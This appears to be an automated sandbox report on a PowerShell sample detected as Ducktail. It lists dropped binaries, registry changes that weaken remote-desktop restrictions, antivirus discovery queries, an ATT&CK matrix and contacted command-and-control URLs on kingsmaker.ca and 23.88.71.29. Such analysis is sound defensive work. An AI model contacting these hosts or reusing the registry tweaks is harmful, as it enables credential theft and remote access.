Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation

Source: C:\Windows\Temp\svczHost.exe

Code function: 16_2_00007FF66138BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

16_2_00007FF66138BFE0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin

Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3088266180.000001C81EB62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4180843271.000001BD75C4C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4175188738.000001BD75BD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR
Source: Yara match	File source: amsi64_5936.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR

Remote Access Functionality

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR
Source: Yara match	File source: amsi64_5936.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	431 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	11 Process Injection	1 Obfuscated Files or Information	Security Account Manager	125 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	531 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	341 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kingsmaker_6.ca.ps1	11%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Temp\svczHost.exe	100%	Avira	TR/AVI.Agent.izors
C:\Windows\Temp\myRdpService.exe	5%	ReversingLabs
C:\Windows\Temp\svczHost.exe	67%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3	0%	Avira URL Cloud	safe
https://kingsmaker.ca	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
http://kingsmaker.ca:443/x	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd22	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff	0%	Avira URL Cloud	safe
http://kingsmaker.ca	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb	0%	Avira URL Cloud	safe
http://crl.microsoft.co	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde650	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db11	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa667424	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry	0%	Avira URL Cloud	safe
http://crl.mic	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngh	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b6043	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd7	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/client/ws	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7ad	0%	Avira URL Cloud	safe
http://crl.micro	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/RdpService/79	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729	0%	Avira URL Cloud	safe
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/c9af	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/RdpService/79h	0%	Avira URL Cloud	safe
http://go.microsoft.c	0%	Avira URL Cloud	safe
http://kingsmaker.ca/api/check	0%	Avira URL Cloud	safe
https://oneget.org	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9	0%	Avira URL Cloud	safe
https://kingsmaker.ca/	0%	Avira URL Cloud	safe
https://kingsmaker.ca/StaticFile/TermServiceTryRun/72	0%	Avira URL Cloud	safe
https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e7	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngXz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false		high
kingsmaker.ca	172.67.179.67	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/api/registry	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/client/ws	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151	false	Avira URL Cloud: safe	unknown
https://chrome.cloudflare-dns.com/dns-query	false		high
https://kingsmaker.ca/StaticFile/RdpService/79	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189	false	Avira URL Cloud: safe	unknown
http://kingsmaker.ca/api/check	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/StaticFile/TermServiceTryRun/72	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	svczHost.exe, myRdpService.exe	false		high
https://contoso.com/License	powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://kingsmaker.ca:443/x	svczHost.exe, 00000010.00000002.4401647954.00000252B68A9000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca	powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B558EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD003D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd22	powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://kingsmaker.ca	powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	svczHost.exe, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	false		high
https://aka.ms/dotnet-warnings/	powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpXz	powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.co	powershell.exe, 00000005.00000002.3077551508.0000015B6D871000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://contoso.com/	powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a	powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb	powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
